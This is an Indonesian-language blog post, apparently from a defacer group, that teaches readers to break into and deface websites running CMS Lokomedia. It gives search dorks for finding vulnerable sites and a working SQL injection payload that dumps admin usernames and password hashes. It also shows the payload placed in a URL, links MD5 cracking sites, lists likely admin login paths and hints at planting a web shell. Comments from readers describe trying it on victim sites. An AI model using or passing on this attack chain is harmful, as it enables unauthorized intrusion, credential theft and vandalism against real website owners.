Deface SQL Lokomedia




Malem fanss :* Malem juga haters :p. Berandal update lagi nih :* Kali ini gw mau share Tutorial Cara Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Web Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak.

Oke, simak langsung aja ya tutorial deface web cms lokomedia :) .

Bahan : 

1. Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Baca juga: Install Websploit Termux

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

Baca jugaTutorial Deface WP Themes Qualifire.

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D (terdelete)


Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)

Sumber: Garuda Security Hacker dan TKJ Cyber Art

Regards,
Berandal. [OWL SQUAD]

24 تعليقات

Komentar Spam Akan kami Hapus

  1. kok agan gampang bener ya :v, ane gagal mulu pas bagian hash md5, selalu not found pas mau di decrypt di hashkiller / md5decrypt. solusi dong gan

    ردحذف
    الردود
    1. Faktor face :v, mungkin belum beruntung, atau kalo mau yha decrypt manual sendiri :D, atau gk yha asal nebak aj

      حذف
  2. coba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
    terima kasih.

    ردحذف
    الردود
    1. sorry min w numpang lewat doang :V

      edeh bocah 1 ni :'v cms gk ada web make blogger :'v pea

      حذف
    2. أزال المؤلف هذا التعليق.

      حذف
  3. kalau login di cpanel suka salah nih

    ردحذف
    الردود
    1. password yg didapat dengan teknik sql lokomedia beda sama password cpanel gan :)

      حذف
  4. udh nemu vuln + id pw admin login udh ketemu ehh pas mau isi id pw admin malah gk ada :3

    ردحذف
  5. ID+Pass udah dapet, eh adminnya loginnya yg ribet dicari XD

    ردحذف
  6. Kok blank ya mas ? Udah berhasil semua , waktu masuk ke log-in admin udah dimasukin datanya kok blank ?

    ردحذف
  7. Njemg Not Found semua :3

    ردحذف
  8. Cari admin loginnya very hard..

    ردحذف
  9. ada yg tau ini tipe hash apa?? c1717b01367691479191356d2ee376d7

    ردحذف
  10. admin login nya gimana nih :V pada ngilang gua liat di site site korban :V

    ردحذف
  11. LINK HALAMAN ADMIN LOGIN DIMANA? UDH KELILING GAK ADA TOMBOL LOGIN AKMJ

    ردحذف
  12. unch unch :*
    berandal... aku ngefans sama berandal :*

    ردحذف
  13. Web Vulnnya berbentuk apa gan? Gw daritadi nyari pas masukin exploit 404 NOT FOUND
    Mohon dijawab:)
    Salken dari JAKARTA CYBER ARMY

    ردحذف

إرسال تعليق

Komentar Spam Akan kami Hapus

Post a Comment

أحدث أقدم